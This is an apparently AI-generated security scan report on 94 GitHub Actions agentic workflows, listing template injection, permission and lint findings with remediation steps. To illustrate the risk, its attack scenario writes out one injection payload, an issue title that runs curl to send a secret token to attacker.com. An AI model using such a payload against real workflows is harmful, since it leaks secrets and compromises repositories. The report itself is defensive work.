🔍 Static Analysis Report - 2025-11-24

[github-actions[bot]]

Executive Summary

Comprehensive static analysis scan completed on 94 agentic workflows using three industry-standard security tools: zizmor (security scanner), poutine (supply chain security), and actionlint (workflow linter).

Key Findings:

• 14 total issues identified across 5 unique workflows
• 10 High severity security issues detected by zizmor
• 0 supply chain vulnerabilities found by poutine ✅
• 4 code quality issues flagged by actionlint
• 2 primary issue types: Template Injection (6 instances) and Excessive Permissions (4 instances)

The most critical finding is template injection vulnerabilities affecting 4 workflows, which could allow command injection attacks through user-controlled input.

Full Analysis Report

Analysis Summary

Tools Used

• zizmor v1.16.3 - GitHub Actions security scanner
• poutine v1.0.4 - Supply chain security analyzer
• actionlint - GitHub Actions workflow linter

Scan Coverage

• Total Workflows Scanned: 94
• Compiled Workflows: 94 (.lock.yml files)
• Workflows with Issues: 5 (5.3%)
• Clean Workflows: 89 (94.7%)

---

Findings by Tool

🔴 Zizmor Security Findings

Issue Type	Severity	Count	Affected Workflows
template-injection	High	6	4 workflows
excessive-permissions	High	4	1 workflow

Total: 10 High severity findings

Template Injection Details

• Description: Code injection via template expansion
• Confidence: High
• Impact: Attackers can inject arbitrary commands through GitHub context variables
• Affected Workflows:
  • changeset.lock.yml
  • close-old-discussions.lock.yml
  • mcp-inspector.lock.yml
  • release-highlights.lock.yml
• Reference: (redacted)#template-injection

Excessive Permissions Details

• Description: Overly broad permissions granted to workflow
• Confidence: High
• Impact: Broader attack surface if workflow is compromised
• Affected Workflows:
  • test-assign-to-agent.lock.yml
• Reference: (redacted)#excessive-permissions

🟢 Poutine Supply Chain Findings

Result: No supply chain vulnerabilities detected ✅

Poutine analyzed the repository for:

• Confused deputy attacks
• Untrusted code execution
• Unverified script execution
• Known vulnerabilities in dependencies
• Debug mode enabled
• Pull requests on self-hosted runners

Conclusion: The workflows follow secure supply chain practices.

🟡 Actionlint Code Quality Findings

Issue Type	Count	Affected Workflows
shellcheck	3	release-highlights.lock.yml
syntax-check	1	cloclo.lock.yml

Total: 4 issues

Shellcheck Issues

• Type: SC2086 - Variables should be double-quoted to prevent word splitting
• Location: release-highlights.lock.yml
• Instances: 3 occurrences on lines 422 (offsets 17:36, 28:31, 33:48)
• Impact: Low - potential for unexpected behavior with spaces in variable values

Syntax Check Issue

• Type: Invalid YAML key
• Location: cloclo.lock.yml:337
• Message: unexpected key "names" for "issues" section
• Impact: Low - workflow may not trigger as expected

---

Priority Ranking

🔴 Critical Priority: Template Injection (6 findings, 4 workflows)

Why This Matters:
Template injection is a critical security vulnerability that can lead to:

• Arbitrary command execution
• Secret exfiltration
• Repository compromise
• Privilege escalation

Attack Scenario:
An attacker could create an issue with a malicious title like:

"; curl attacker.com?secret=$SECRET_TOKEN #

If a workflow interpolates ${{ github.event.issue.title }} directly into a shell command, this would execute the attacker's curl command and leak secrets.

Recommendation: Fix immediately

🟠 High Priority: Excessive Permissions (4 findings, 1 workflow)

Why This Matters:
Overly broad permissions violate the principle of least privilege and increase the blast radius of a potential compromise.

Recommendation: Review and restrict permissions to the minimum required

🟡 Medium Priority: Code Quality Issues (4 findings, 2 workflows)

Why This Matters:
While not security-critical, these issues can lead to unexpected behavior and maintenance problems.

Recommendation: Address during regular maintenance

---

Detailed Fix Guidance

Fix Template: Template Injection

Problem: GitHub context variables directly interpolated into shell scripts

Solution: Always pass context values through environment variables

Example Fix

Before (Vulnerable):

- name: Process data
  run: |
    echo "Processing: ${{ github.event.issue.title }}"
    curl "(redacted) github.repository }}"

After (Secure):

- name: Process data
  env:
    ISSUE_TITLE: ${{ github.event.issue.title }}
    REPOSITORY: ${{ github.repository }}
  run: |
    echo "Processing: $ISSUE_TITLE"
    curl "(redacted)"

Complete Fix Instructions

For each affected workflow (changeset, close-old-discussions, mcp-inspector, release-highlights):

1. Identify all template expressions (${{ ... }}) in run: blocks
2. Extract to env: section of the step
3. Replace with shell variable references ($VAR_NAME or ${VAR_NAME})
4. Use proper quoting to prevent word splitting

Common Patterns:

• ${{ github.repository_owner }} → env.REPO_OWNER + $REPO_OWNER
• ${{ github.event.repository.name }} → env.REPO_NAME + $REPO_NAME
• ${{ steps.*.outputs.* }} → env.OUTPUT_VALUE + $OUTPUT_VALUE
• ${{ github.actor }} → env.ACTOR + $ACTOR

---

Workflow-Specific Analysis

changeset.lock.yml

• Issues: 1 template-injection finding
• Severity: High (Informational confidence for one instance)
• Location: Job push_to_pull_request_branch, Step 3
• Vulnerable Code: steps.app-token.outputs.token interpolated directly
• Fix: Move token to environment variable

close-old-discussions.lock.yml

• Issues: 1 template-injection finding
• Severity: High
• Location: Job agent, Step 2
• Vulnerable Code: github.repository_owner and github.event.repository.name in GraphQL query
• Fix: Pass repository information through env vars

mcp-inspector.lock.yml

• Issues: Multiple template-injection findings
• Severity: High
• Fix: Review all GitHub context usage in shell scripts

release-highlights.lock.yml

• Issues:
  • Template injection (High severity)
  • 3 shellcheck warnings (quote variables)
• Location: Line 422
• Fix: Add environment variables and quote shell variables properly

test-assign-to-agent.lock.yml

• Issues: 4 excessive-permissions findings
• Severity: High
• Fix: Review and restrict workflow permissions to minimum required

cloclo.lock.yml

• Issues: 1 syntax-check error
• Severity: Low
• Location: Line 337
• Fix: Remove or rename invalid "names" key in issues section

---

Recommendations

Immediate Actions (This Week)

1. Fix Template Injection in 4 workflows:

   • changeset.lock.yml
   • close-old-discussions.lock.yml
   • mcp-inspector.lock.yml
   • release-highlights.lock.yml

   Impact: Critical security vulnerability remediation
   Effort: ~2-4 hours per workflow

2. Review Permissions in test-assign-to-agent.lock.yml:

   • Document why each permission is needed
   • Remove unnecessary permissions

   Impact: Reduce attack surface
   Effort: ~1 hour

Short-term Actions (This Month)

3. Fix Code Quality Issues:

   • Add quotes to shell variables in release-highlights.lock.yml
   • Fix syntax error in cloclo.lock.yml

   Impact: Improve maintainability
   Effort: ~30 minutes

4. Establish Automated Scanning:

   • Add zizmor, poutine, actionlint to CI/CD
   • Block PRs with new High severity findings

   Impact: Prevent future vulnerabilities
   Effort: ~2-4 hours setup

Long-term Actions (Next Quarter)

5. Update Workflow Creation Guidelines:

   • Add template injection prevention to docs
   • Create secure workflow templates
   • Add pre-commit hooks for static analysis

   Impact: Systematic prevention
   Effort: ~1-2 days

6. Security Training:

   • Document common pitfalls
   • Share fix examples with team
   • Regular security reviews

   Impact: Team awareness and capability
   Effort: Ongoing

---

Conclusion

This static analysis scan provides a comprehensive security and quality baseline for the agentic workflows repository. The findings are concentrated in a small subset of workflows (5.3%), with template injection being the primary security concern.

Positive Findings:

• ✅ No supply chain vulnerabilities detected
• ✅ 94.7% of workflows are clean
• ✅ Issues are concentrated and fixable

Action Required:

• 🔴 Immediate: Fix template injection vulnerabilities (4 workflows)
• 🟠 High: Review and restrict excessive permissions (1 workflow)
• 🟡 Medium: Address code quality issues (2 workflows)

Next Steps:

1. Create issues/PRs for each affected workflow
2. Apply fixes using the provided templates
3. Re-scan to verify remediation
4. Establish continuous monitoring

---

Scan Metadata:

• Scan Date: 2025-11-24
• Tools: zizmor v1.16.3, poutine v1.0.4, actionlint
• Workflows: 94 compiled workflows
• Report Generated: Automated via static-analysis-report workflow

AI generated by Static Analysis Report